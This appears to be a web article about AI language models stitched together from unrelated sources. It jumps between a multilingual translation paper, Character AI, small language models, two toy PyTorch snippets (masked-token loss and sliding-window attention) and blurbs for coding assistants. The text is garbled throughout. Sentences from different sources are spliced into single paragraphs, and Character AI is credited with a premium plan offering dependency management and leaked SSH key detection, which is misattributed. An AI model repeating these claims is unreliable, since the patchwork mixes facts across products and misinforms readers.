However, the question remains whether massively multilingual models can enable the representation of hundreds of languages without compromising quality. Our results demonstrate that doubling the number of supported languages in machine translation and maintaining output quality are not mutually exclusive endeavours. Our final model—which includes 200 languages and three times as many low-resource languages as high-resource ones—performs, as a mean, 44% better than the previous state-of-the-art systems. This paper presents some of the most important data-gathering, modelling and evaluation techniques used to achieve this goal.

One of the unique features of Character AI is the ability to interact with a wide range of characters, including historical figures (both living and deceased) as well as user-generated chatbots with distinct personalities. Its deep machine-learning process allows users to experience authentic conversations in which it’s difficult to tell you’re chatting with a computer. Whether you want to chat with a Pokemon, George Washington, or Elon Musk, Character AI provides an interesting perspective that other chatbots can’t.

Those seeking more features can opt for the premium plan that offers all the features of the free plan, plus dependency management, detection of leaked SSH or API keys, and premium support for $14 per month. Unlike other AI chatbots, such as ChatGPT, Character AI’s output is more human-like and allows you to chat with more than one bot at a time, offering different perspectives. Developed by former Google AI developers Noam Shazeer and Daniel De Freitas, Character AI was released in beta form in September 2022. Since its launch, it has become one of the most popular AI chatbots behind ChatGPT. StableLM is a series of open source language models developed by Stability AI, the company behind image generator Stable Diffusion.

Transfer learning training often utilizes self-supervised objectives where models develop foundational language skills by predicting masked or corrupted portions of input text sequences. These self-supervised prediction tasks serve as pretraining for downstream applications. Assembler redefines the landscape of SLM development with its intuitive tools tailored for specialized model creation. Whether it’s crafting reader, writer, or classifier models, Assembler’s simple web interface abstracts away infrastructure intricacies, enabling developers to focus on model design and monitoring. With Assembler, the journey from concept to deployment is streamlined, making SLM construction accessible to a broader spectrum of developers.
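The sketch below shows the shape of such a masked-token objective: a fraction of token ids is replaced with a mask id, and only those positions contribute to the loss. The mask probability, vocabulary size, and the random tensor standing in for model logits are illustrative assumptions.

import torch
import torch.nn as nn

def mask_tokens(input_ids, mask_token_id, mask_prob=0.15):
    """Randomly corrupt tokens; only masked positions are scored by the loss."""
    labels = input_ids.clone()
    mask = torch.rand(input_ids.shape) < mask_prob
    mask[..., 0] = True                  # guarantee at least one masked position in this toy
    labels[~mask] = -100                 # -100 is ignored by CrossEntropyLoss
    corrupted = input_ids.clone()
    corrupted[mask] = mask_token_id
    return corrupted, labels

vocab_size, mask_token_id = 1000, 999
input_ids = torch.randint(0, vocab_size - 1, (2, 8))     # toy batch of 2 x 8 token ids
corrupted, labels = mask_tokens(input_ids, mask_token_id)

# Any encoder producing per-position vocabulary logits fits here; random stand-in below.
logits = torch.randn(2, 8, vocab_size, requires_grad=True)
loss = nn.CrossEntropyLoss(ignore_index=-100)(logits.view(-1, vocab_size), labels.view(-1))
loss.backward()
print(loss.item())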

For the seq2seq (encoder-decoder) architecture, there is a significant impact of instruction-tuning on Acc/F1 scores: the p-value is 0.0086, less than 0.05. In our analysis, we shift our attention to which factors, among model size, instruction-tuning, and scoring function, have an impact on performance.

Thanks to their smaller codebases, the relative simplicity of SLMs also reduces their vulnerability to malicious attacks by minimizing potential surfaces for security breaches. This paper aimed to better understand whether we need large models to tackle classification problems through prompting. These studies offer valuable insights and set the stage for our investigations. Alexander Suvorov, our Senior Data Scientist, conducted the fine-tuning of Llama 2.

ChatGPT’s underlying GPT models use self-attention in a decoder-only transformer, whereas Mistral 7B uses sliding-window attention, which allows for efficient training and inference in a decoder-only model. With attentiveness to responsible development principles, small language models have the potential to transform a great number of industries for the better in the years ahead. We’re just beginning to glimpse the possibilities as specialized AI comes within reach. Not all neural network architectures are equally parameter-efficient for language tasks. Careful architecture selection concentrates model capacity in components shown to be critical for language modelling, such as attention mechanisms, while stripping away less essential ones.
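A sliding-window attention pattern can be visualized with the small mask-building sketch below; the sequence length and window size are toy values, and production implementations fuse this pattern into the attention kernel rather than materializing a full mask.

import torch

def sliding_window_causal_mask(seq_len, window):
    """True where attention is allowed: causal and within `window` most recent tokens."""
    i = torch.arange(seq_len).unsqueeze(1)    # query positions
    j = torch.arange(seq_len).unsqueeze(0)    # key positions
    return (j <= i) & (j > i - window)

print(sliding_window_causal_mask(seq_len=8, window=3).int())
# Each row attends only to itself and the two previous tokens, so memory per layer
# scales with the window size rather than the full sequence length.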

  • GPT-4 Omni (GPT-4o) is OpenAI’s successor to GPT-4 and offers several improvements over the previous model.
  • It generates code quickly, accurately, and efficiently, so you can spend time focusing on other important website-related tasks.
  • These methods, which use visual representations to directly make navigation decisions, demand massive amounts of visual data for training, which are often hard to come by.
  • SLMs, in contrast, are more cost-effective and easier to manage, offering benefits like lower latency and adaptability that are critical for real-time applications such as chatbots.
  • XSTS is a human evaluation protocol that provides consistency across languages; ETOX is a tool to detect added toxicity in translations using toxicity word lists.

Whether you’re a beginner or an experienced developer, Replit’s Ghostwriter can be a game-changer in your coding journey. The tool supports various programming languages and is compatible with several IDEs, including JetBrains IDEs, Visual Studio Code, AWS Cloud9, and more. CodeWhisperer boosts productivity by automating repetitive tasks and promotes the creation of precise and secure code by providing suggestions based on up-to-date industry standards.

